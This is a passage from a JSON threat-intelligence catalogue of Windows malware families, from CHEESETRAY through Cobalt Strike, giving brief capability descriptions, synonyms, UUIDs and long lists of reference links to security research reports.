"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c" ], "synonyms": [ "CROWDEDFLOUNDER" ], "type": [] }, "uuid": "7a6c1063-32b9-4007-8283-ccd4a2163caa", "value": "CHEESETRAY" }, { "description": "Chernolocker is a ransomware that encrypts a victim's files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker's email address which changes over time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker", "https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "e21dc86d-c8a5-44f7-b9d6-5e60373e838b", "value": "Chernolocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" ], "synonyms": [ "cherry_picker", "cherrypicker", "cherrypickerpos" ], "type": [] }, "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", "value": "CherryPicker POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" ], "synonyms": [], "type": [] }, "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, { "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers", "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://unit42.paloaltonetworks.com/china-chopper-webshell/", "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/", "https://www.secureworks.com/research/threat-profiles/bronze-president", "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", "https://twitter.com/ESETresearch/status/1366862946488451088", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://redcanary.com/blog/microsoft-exchange-attacks", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf", "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits", "https://attack.mitre.org/software/S0020/", "https://blog.joshlemon.com.au/hafnium-exchange-attacks/", "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/", "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers", "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a", "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/" ], "synonyms": [], "type": [] }, "uuid": "0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53", "value": "CHINACHOPPER" }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" ], "synonyms": [], "type": [] }, "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", "value": "Chinad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm", "https://id-ransomware.blogspot.com/2020/02/chinajm-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "ef216f1d-9ee5-4676-ae34-f954a8611290", "value": "ChinaJm Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy", "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", "https://community.riskiq.com/article/56fa1b2f", "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", "https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf", "https://community.riskiq.com/article/5fe2da7f" ], "synonyms": [], "type": [] }, "uuid": "f8f5f33b-c719-4b6d-bf98-07979ac0cd97", "value": "Chinoxy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" ], "synonyms": [], "type": [] }, "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", "value": "Chir" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/", "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html" ], "synonyms": [ "AndroKINS" ], "type": [] }, "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", "value": "Chthonic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cifty", "http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html" ], "synonyms": [], "type": [] }, "uuid": "8a1af36b-b8e1-4e05-ac42-c2866ffba031", "value": "cifty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi", "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html", "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/" ], "synonyms": [], "type": [] }, "uuid": "d0f0f754-fe9b-45bd-a9d2-c6110c807af4", "value": "Cinobi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/" ], "synonyms": [], "type": [] }, "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", "value": "Citadel" }, { "description": "Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling", "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf", "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", "https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf" ], "synonyms": [], "type": [] }, "uuid": "783c8192-d00d-446c-bf06-0ce0cb4bc2c2", "value": "Clambling" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon", "https://content.fireeye.com/apt-41/rpt-apt41/" ], "synonyms": [], "type": [] }, "uuid": "c433e0f1-760c-41e6-bb62-13eaf7bbf1f4", "value": "CLASSFON" }, { "description": "CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cleantoad", "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf" ], "synonyms": [], "type": [] }, "uuid": "c0417767-5b98-43b0-b9e7-e43dc7f53c6a", "value": "CLEANTOAD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" ], "synonyms": [], "type": [] }, "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", "value": "Client Maximus" }, { "description": "The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information.\r\n The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/", "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" ], "synonyms": [], "type": [] }, "uuid": "5d6a9b59-96b1-4bc4-824d-ffe208b99462", "value": "ClipBanker" }, { "description": "Clop is a ransomware which uses the .clop extension after having encrypted the victim's files. Another unique characteristic belonging with Clop is in the string: \"Dont Worry C|0P\" included into the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop", "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", "https://github.com/Tera0017/TAFOF-Unpacker", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", "https://twitter.com/darb0ng/status/1338692764121251840", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/" ], "synonyms": [], "type": [] }, "uuid": "8071f2d8-cc44-4682-845b-6f39a9f8b587", "value": "Clop" }, { "description": "CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye", "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", "https://labs.vipre.com/unloading-the-guloader/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", "https://twitter.com/VK_Intel/status/1255537954304524288", "https://twitter.com/TheEnergyStory/status/1239110192060608513", "https://twitter.com/VK_Intel/status/1252678206852907011", "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", "https://twitter.com/sysopfb/status/1258809373159305216", "https://research.checkpoint.com/2020/guloader-cloudeye/", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", "https://www.joesecurity.org/blog/3535317197858305930", "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", "https://twitter.com/VK_Intel/status/1257206565146370050", "https://blog.morphisec.com/guloader-the-rat-downloader", "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", "https://twitter.com/TheEnergyStory/status/1240608893610459138", "https://www.crowdstrike.com/blog/guloader-malware-analysis/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", "https://malwation.com/malware-config-extraction-diaries-1-guloader/", "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", "https://labs.k7computing.com/?p=20156" ], "synonyms": [ "GuLoader", "vbdropper" ], "type": [] }, "uuid": "966f54ae-1781-4f2e-8b32-57a242a00bb9", "value": "CloudEyE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", "https://www.f-secure.com/weblog/archives/00002822.html" ], "synonyms": [], "type": [] }, "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", "value": "Cloud Duke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" ], "synonyms": [], "type": [] }, "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", "value": "CMSBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [ "meciv" ], "type": [] }, "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", "value": "CMSTAR" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot", "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" ], "synonyms": [], "type": [] }, "uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217", "value": "CoalaBot" }, { "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.brighttalk.com/webcast/7451/462719", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", "https://twitter.com/ffforward/status/1324281530026524672", "https://community.riskiq.com/article/0bcefe76", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", "https://www.secureworks.com/research/threat-profiles/bronze-president", "https://blog.macnica.net/blog/2020/11/dtrack.html", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", "https://isc.sans.edu/diary/26752", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://twitter.com/TheDFIRReport/status/1356729371931860992", "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", "https://401trg.com/burning-umbrella/ ", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://github.com/sophos-cybersecurity/solarwinds-threathunt", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", "https://asec.ahnlab.com/ko/19860/", "https://www.youtube.com/watch?v=gfYswA_Ronw", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", "https://malwarelab.eu/posts/fin6-cobalt-strike/", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", "https://isc.sans.edu/diary/rss/26862", "https://isc.sans.edu/diary/rss/27176", "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", "https://community.riskiq.com/article/f0320980", "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/Apr4h/CobaltStrikeScan", "https://twitter.com/VK_Intel/status/1294320579311435776", "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", 